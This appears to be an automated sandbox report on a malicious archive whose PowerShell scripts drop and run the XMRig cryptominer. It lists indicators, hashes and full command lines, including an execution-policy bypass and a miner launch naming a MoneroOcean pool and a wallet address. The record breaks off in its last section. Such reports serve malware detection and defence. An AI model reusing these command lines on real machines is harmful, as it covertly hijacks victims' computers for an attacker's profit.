Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 18:30
Signatures
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win11-20240426-en
Max time kernel
1790s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2280 wrote to memory of 4452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2280 wrote to memory of 4452 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dqvjwge.a13.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:42
Platform
win10-20240404-en
Max time kernel
1800s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2900 wrote to memory of 2312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2900 wrote to memory of 2312 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyyfydac.nof.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:44
Platform
win10v2004-20240508-en
Max time kernel
1586s
Max time network
1595s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suoxsbnw.ojt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:46
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4496 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4496 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybtlsrzt.cnc.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1824-153-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-154-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-155-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-156-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
memory/1824-157-0x00007FF79F120000-0x00007FF79FD53000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:23
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1496 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1496 wrote to memory of 1680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
memory/1496-0-0x00007FFB22803000-0x00007FFB22805000-memory.dmp
memory/1496-1-0x0000019233510000-0x0000019233532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sytnh33q.akj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1496-11-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-12-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-14-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-15-0x000001924C760000-0x000001924C772000-memory.dmp
memory/1496-16-0x000001924C400000-0x000001924C40A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1680-47-0x000001F1DE8E0000-0x000001F1DE900000-memory.dmp
memory/1680-48-0x000001F1DE920000-0x000001F1DE940000-memory.dmp
memory/1680-49-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-51-0x000001F1DE960000-0x000001F1DE980000-memory.dmp
memory/1680-50-0x000001F1DE940000-0x000001F1DE960000-memory.dmp
memory/1680-52-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1496-53-0x00007FFB22803000-0x00007FFB22805000-memory.dmp
memory/1496-54-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1496-56-0x00007FFB22800000-0x00007FFB232C1000-memory.dmp
memory/1680-55-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-59-0x000001F1DE960000-0x000001F1DE980000-memory.dmp
memory/1680-58-0x000001F1DE940000-0x000001F1DE960000-memory.dmp
memory/1680-57-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-60-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-61-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-62-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-63-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-64-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-65-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-66-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-67-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-68-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-69-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-70-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-71-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-72-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-73-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-74-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-75-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-76-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-77-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-78-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-79-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-80-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-81-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-82-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-83-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-84-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-85-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-86-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-87-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-88-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-89-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-90-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-91-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-92-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-93-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-94-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-95-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-96-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-97-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-98-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-99-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-100-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-101-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-102-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-103-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-104-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-105-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-106-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-107-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-108-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-109-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-110-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-111-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-112-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-113-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-114-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-115-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-116-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-117-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
memory/1680-118-0x00007FF61AC90000-0x00007FF61B8C3000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:35
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 1576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
